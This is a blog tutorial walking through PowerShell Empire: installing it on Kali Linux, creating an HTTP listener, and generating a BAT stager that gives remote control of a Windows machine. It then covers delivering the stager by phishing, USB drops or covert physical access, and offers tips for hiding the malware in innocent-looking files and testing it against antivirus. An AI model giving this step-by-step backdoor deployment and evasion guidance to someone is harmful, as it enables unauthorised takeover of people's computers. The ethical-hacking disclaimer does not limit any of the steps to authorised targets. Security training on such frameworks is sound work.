Ethical Hacking Tutorials

Hacking Computers With Powershell Empire πŸ’€πŸ”“

Empire is a unique tool for generating discreet, stealthy malware that can be used to take full control of a target’s computer.
POWERSHELL EMPIRE KALI LINUX SETUP

Read this bit first

πŸ‘‰ I stronglyΒ condemn any illegal use of this material as is outlined in my legal disclaimer. There are plenty of responsible applications for this content, and it is here to inform ethical hackers, penetration testers, and anyone who is intrigued as to how systems are compromised. Remember the golden rule and THINK before you type. πŸ‘ˆ

What you will learn

It has been around for a few years, and despite the Github Repo being archived, Powershell Empire still has a group of loyal patrons using it to serve up some slick reverse-shells.Β 

Powershell Empire, or Empire for short, allows a hacker to quickly create simple forms of malware within minutes, yet whilst harnessing some powerful features and AES encryption.

I have used Empire on and off for a few years now, and in this guide, we will explore what Empire is, how it works, and how it can be used to gain full control over a target’s computer.

What is Empire?

PowerShell Empire is a post-exploitation framework that has gained significant traction in the realm of cybersecurity, particularly in penetration testing and red teaming scenarios. In short, Empire allows almost anyone to create discreet backdoors and reverseshells – a form of malware – and infiltrate a target’s computer with them.Β 

Once infiltrated, the hacker using Empire in theory can take full control of the target’s computer.Β 

Developed by Will Schroeder, Matt Nelson, and Justin Warner, it fills a crucial niche by leveraging the power of PowerShell, a scripting language native to Windows operating systems, for offensive security operations.

Unlike tools such as TheFatRat and Veil, Empire does not rely on Metasploit to create it’s backdoors. Instead, it exploits Microsoft’s Powershell, which comes preinstalled in Windows 7 and all following versions.

Empire uses AES Encryption and uses Encryption Key Exchange. As a result, these backdoors use cutting-edge encryption for maximum discreetness, and in my experience, can often bypass Antivirus Software – however Heuristic Analysis is catching up. You can learn more about how antivirus software works by clicking here.Β 

Installing Empire

Installing Empire within Kali Linux or Parrot OS is a straightforward process, and the necessary files can be easily retrieved from the apt package manager.

To get started, we will update our package manager to retrieve the latest versions. This is achieved by entering sudo apt update into your terminal. As we are using sudo – the equivalent of running a software as an administrator – we must provide a password to do so. Enter your administration password and then proceed to the next step.

Then, we can proceed to install Powershell Empire. This can be done by typing the command on line two below.Β 

				
					sudo apt update
sudo apt install powershell-empire
				
			

And that’s all there is to it! We now have Empire installed. Now, it’s time to start hacking.

Starting our server

To run Empire, we must do two things: run the server, and the client.Β 

The server is essentially the ‘backend’ of Empire. It is responsible for serving the backdoors – or the stagers as Empire refers to them as – and performs a number of other functions.

And the Empire Client is what we as hackers use to create and interact with the malware we create.Β 

To use Empire, we must first start our server on our Kali Linux machine. Enter the following command in your Kali Linux terminal, and be sure to prefix it with sudo.

When your server is active, you can minimise the command prompt as it will be secondary to the client terminal. However, ensure that you do not close or exit the server in the process.

				
					sudo powershell-empire server
				
			

Starting the Empire Client

To run the empire client, we enter the command listed below in a separate Linux terminal from the original server terminal, which you should minimalise yet keep running. Remember that when using Empire, you will predominately be working with the client.Β 

The client will allow us to create malware, or shells, and interact with the computers we hack.Β 

				
					sudo powershell-empire client
				
			

You will now see a screen on your terminal as below. On the left hand panel is my Empire Server, and on the right panel is my Empire Client.

POWERSHELL EMPIRE KALI LINUX SETUP
Empire Kali Linux Setup

Powershell Empire In Kali Linux Features, Components, & Help Menu

To use Empire in Kali Linux, we must know what some of the key terms within the package are. To do so, you can type ‘help’ in your Client Terminal to see all the available configurations.Β 

				
					help
				
			

This will display all the options and modules in a format as shown below:

Empire Kali Linux Help
Empire Kali Linux Help

For the uninitiated, I will explain briefly which each of these key options means.

Listeners

Listeners in Empire serve as communication endpoints for compromised hosts (agents) to connect back to the Empire server. They define the parameters for how agents establish communication, including the listening address, port, and communication protocol. Think of listeners as the receivers waiting to catch signals from agents deployed on target systems.

Agents

In the context of Empire, agents are instances of PowerShell scripts or payloads that are deployed on compromised systems. These agents beacon back to the Empire server, establishing a connection that allows operators to remotely control and manage the compromised host. Agents serve as the foothold for post-exploitation activities, providing access to system resources and enabling further penetration testing or red team operations.Β 

Interact

The “interact” command in Empire allows operators to interact with specific agents that have established a connection with the Empire server. Once an agent is selected for interaction, operators can execute commands, deploy payloads, gather information, or perform other actions on the compromised system. Interacting with agents provides a direct channel for post-exploitation activities.

Plugins

Empire offers a plugin system that extends its functionality beyond its core features. Plugins are additional modules or scripts that provide specialised capabilities for specific tasks or scenarios. These can include custom payloads, post-exploitation modules, evasion techniques, or automation scripts. Plugins allow users to tailor Empire to their specific needs and enhance its effectiveness in various cybersecurity engagements.Β 

Connect

The “connect” command facilitates communication between the Empire server and external components or services, such as additional Empire instances, third-party tools, or external servers. It enables Empire to integrate with other cybersecurity tools and platforms, exchange data, or establish communication channels for coordinated operations. The connect command enhances Empire’s versatility and interoperability in complex cybersecurity environments.

Admin

The “admin” command in Empire grants administrative privileges within the framework, allowing users to perform administrative tasks such as managing users, configuring server settings, or monitoring system activity. Admin privileges are essential for maintaining and securing the Empire server, controlling access to sensitive functions, and ensuring the integrity of cybersecurity operations.

Creating Listeners in Powershell Empire

Let’s get started hacking with Empire. We will start by creating Listeners.Β 

As discussed above, a Listener is how targets will communicate with the hacker’s command and control server. There are several types of listeners available, using a variety of different protocols.Β 

In our case, we will use the http listener. This will disguise our malware as legitimate – albeit non-encrypted (http) – traffic.

Enter the following command to generate your HTTP listener.Β 

Configuring an Empire Listener

				
					uselistener http
				
			

Awesome! We have now created our first listener.

Now, it is time to check the settings and configurations of our listener. By default, most of the settings work perfectly fine – although you may want to modify a few to suit your preferences.

You can see a list of the default configurations of the listener in my screenshot below.Β 

Empire Kali Linux Listener Setup

The port number, however, is a setting that must be configured. To do so, complete the following command.

				
					set port {your preferred port number}
				
			

Now that we have set the port number, we can reenter the options command to see our updated list of options. In the table, you should see your chosen port number listed in the port column. In my case, for demonstration purposes, I have chosen port 8080.

				
					options
				
			

Activating an Empire Listener

Once you are happy with all the options configured to your preferences, we can activate our listener through the below command:

				
					execute
				
			

It should state that the listener has successfully started. Congratulations! The first part is now complete.Β 

What are stagers in PowershellEmpire

Now that we have generated our listener, its time to create the payload. This is referred to as a Stager in Empire. To reiterate, this is essentially the payload that will detonate on the target’s computer.

First, we will go back to the Empire Client’s homescreen and navigate away from the Listeners screen.

				
					back
				
			

Now that we have generated our listener, its time to create the payload. This is referred to as a Stager in Empire. To reiterate, this is essentially the payload that will detonate on the target’s computer.

First, we will go back to the Empire Client’s homescreen and navigate away from the Listeners screen.

There are a number of different Empire Stagers. I have listed a few below, but feel free to skip to the next section.

Empire EXE Stager

Windows Executable (EXE) Stager: This stager generates a standalone Windows executable file (.exe) that can be executed on target systems. It often relies on techniques such as reflective DLL injection or shellcode injection to achieve memory-resident execution without touching the disk, enhancing stealth and evading detection by traditional antivirus solutions.

Powershell Stager

PowerShell Stager: As PowerShell is native to Windows operating systems, this stager leverages PowerShell one-liners or scripts to execute commands directly in memory. PowerShell stagers are popular due to their versatility, ease of use, and effectiveness in bypassing application whitelisting and other security controls.

Macro Stager

Macro Stager: This stager utilises malicious macros embedded within documents (e.g., Microsoft Office documents) to execute PowerShell or other Empire payloads. Macro stagers are commonly delivered via phishing emails and exploit the trust users place in seemingly legitimate documents, making them an effective vector for initial compromise.

DLL Stager

DLL (Dynamic Link Library) Stager: DLL stagers generate dynamic link library (.dll) files that can be injected into processes or loaded via reflective injection techniques. DLL stagers are often used in memory-resident attacks to achieve stealthy persistence and evade detection by antivirus solutions.

Python Stager

Python Stager: This stager generates Python scripts that execute Empire payloads using the Python interpreter. Python stagers are versatile and can be used on a variety of platforms, making them suitable for cross-platform deployments and engagements targeting environments where Python is prevalent.

Generating stagers in PowershellEmpire

There are many more stagers other than those listed above. For the purposes of this tutorial, we will use a Windows Launcher in a BAT Format – when I have the time, I will revisit this article and explain exactly what this means.

Anyway, you can do so by entering the following command.

				
					usestager windows_launcher_bat
				
			

This will show the following result on your terminal.

Empire Kali Linux Stager Setup

This will show the following result on your terminal. You can modify any of these options by using the set command.Β 

The main value that we must set, however, is the listener. Essentially, we are linking the stager to the listener we created earlier.

				
					set listener {listener name}, in my case, http
				
			

We should also rename the output file so that it replaces the generic name. Again, we use the set command, and remember to use the appropriate file suffix, in our case, BAT:

				
					set OutFile mytestempire.bat
				
			

Finally, we can now generate our file. Again, to do so, simply enter the following command:

				
					generate
				
			

And that’s it! Now we have generated a BAT Empire Stager, and a listener, and we are now ready to begin exploiting our target – legally and ethically, of course ;D

Infiltrating our target

And that’s it! Now we have generated a BAT Empire Stager, and a listener, and we are now ready to begin exploiting our target – legally and ethically, of course ;D

Now that we’ve set up the stager and listener in PowerShell Empire, the next step is to deliver the payload to the target system and execute it. Here’s how we can proceed:

Delivering the malware

There are various delivery methods to consider, depending on the target’s environment and the level of access we have. Common delivery methods include:

  • Social Engineering: Utilise phishing emails, malicious links, or USB drops to trick the target into executing the payload.
  • Exploitation: Exploit vulnerabilities in software or services running on the target system to gain execution privileges.
  • Physical Access: Directly install the payload on the target system if physical access is available. This essentially involves sneaking it onto a target’s computer whilst they least expect it.

Executing the Empire Stager on the target's device

Once the payload is delivered to the target system, it needs to be executed to establish communication with the Empire listener. This can be achieved through techniques such as:

  • Running the BAT Empire Stager: If we generated a BAT stager, the target can execute it by double-clicking the file or running it via command prompt.
  • Exploiting Vulnerabilities: If exploiting vulnerabilities, the payload may be injected into a vulnerable application or service to gain code execution.

Β 

Now obviously, if I was to hack a target, I would be much, much more discreet than this. I would embed the malware in something that seems innocent looking, and I would have run the stager through a free online service that checks whether or not your malware will be detected by antivirus.Β 

Coming Soon: Exploiting the target...

Now that we have hacked our target, it is time to begin causing problems… to put it mildly. I haven’t finished writing this article but I will come back to it soon, I promise. In the meantime, you can subscribe to my newsletter to get notified, or contact me if you need any help running Empire (in a legal and ethical context).

Hey! Can we make it official? 😘

I would love to share my latest ethical hacking, defensive security, OSINT, and anonymity guides with you. But I’ll need you to trust me with something… your email address. I promise not to spam you, and you can count on me to keep your data safe πŸ˜‡

More Hacking Guides

Hacking Computers With Powershell Empire πŸ’€πŸ”“

How I learned Hacking, and my tips for fast-tracking the learning journey πŸ’»

This is how I hack WiFi networks πŸ₯·

How I hack websites using BurpsuiteπŸ’»

Nmap: an essential tool for hacking βœ…

Hacking websites with WPScan 🧐

Fifteen Steps to maximising firefox privacy πŸ”’βœ…

Download the complete FireFox checklist that I give to my counter-surveillance clients – completely free of charge! I will take you step-by-step through advanced Firefox Configurations that will help you maximise your privacy, security and anonymity.Β 

Enter your details below and I will email it to you straight away. And don’t worry, your data is safe with me πŸ˜‡

Access free subscriber only content 😘

I would love to share my latest ethical hacking, defensive security, OSINT, and anonymity guides with you. But I’ll need you to trust me with something… your email address. Your data will be encrypted and I will never sell it to third parties πŸ˜‡

UK Cybersecurity Company

About Aitken Security

Aitken Security is a UK Cybersecurity Company specialising in offensive and defensive security.